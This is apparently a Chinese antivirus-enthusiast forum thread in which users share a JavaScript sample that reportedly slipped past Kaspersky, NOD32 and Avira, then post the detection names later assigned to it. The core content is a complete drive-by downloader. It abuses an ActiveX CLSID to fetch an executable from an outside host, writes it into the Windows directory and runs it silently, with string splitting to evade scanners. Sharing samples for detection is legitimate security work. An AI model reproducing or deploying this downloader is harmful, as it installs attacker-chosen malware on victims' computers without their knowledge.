过AVIRA和nod32

The EQs

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update as Trojan-Downloader.JS.Small.ew. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com

The EQs

已经上报给AVIRA和eset了。。。。

allenhippo

1. 
   
2. function gn(n)
   
3. {
   
4.         var number = Math.random()*n;
   
5.         return '~tmp'+Math.round(number)+'.exe';
   
6. }
   
7. try
   
8. {
   
9.         dl='http://mail.8u8y.com/ad/pic/...................exe';
   
10.         var df=document.createElement("object");
    
11.         df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    
12.         var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
    
13.         var S=df.CreateObject("Adodb.Stream","");
    
14.         S.type=1;
    
15.         x.open("GET", dl,0);
    
16.         x.send();
    
17.         fname1=gn(10000);
    
18.         var F=df.CreateObject("Scripting.FileSystemObject","");
    
19.         var tmp=F.GetSpecialFolder(0);
    
20.         fname1= F.BuildPath(tmp,fname1);
    
21.         S.Open();
    
22.         S.Write(x.responseBody);
    
23.         S.SaveToFile(fname1,2);
    
24.         S.Close();
    
25.         var Q=df.CreateObject("Shell.Application","");
    
26.         Q.ShellExecute(fname1,"","","open",0);
    
27. }
    
28. catch(i)
    
29. {
    
30.         i=1;
    
31. }
    

复制代码

The EQs

在网上看到这段代码。。。。然后自己copy一下。。。没想到竟然过了卡巴，nod32和AVIRA

solcroft

代码... 你竟然要杀软杀代码...
先把它compile成exe再来扫吧
可惜我的compiler被电脑管理员卸载了

The EQs

本来想弄成js给卡巴的。。。。。

sdbsky

\virus\鏂板缓_鏂囨湰鏂囨。.rar>>鏂板缓 鏂囨湰鏂
囨。\新建 文本文档.txt

Trojan.DL.JS.Agent.lcd

moonsilver

C:\Documents and Settings\moonsilver\桌面\1.js

Trojan.DL.JS.Agent.f

rising

kfcnknight

Generic.XPL.ADODB.7A6784DE

马力

驱逐舰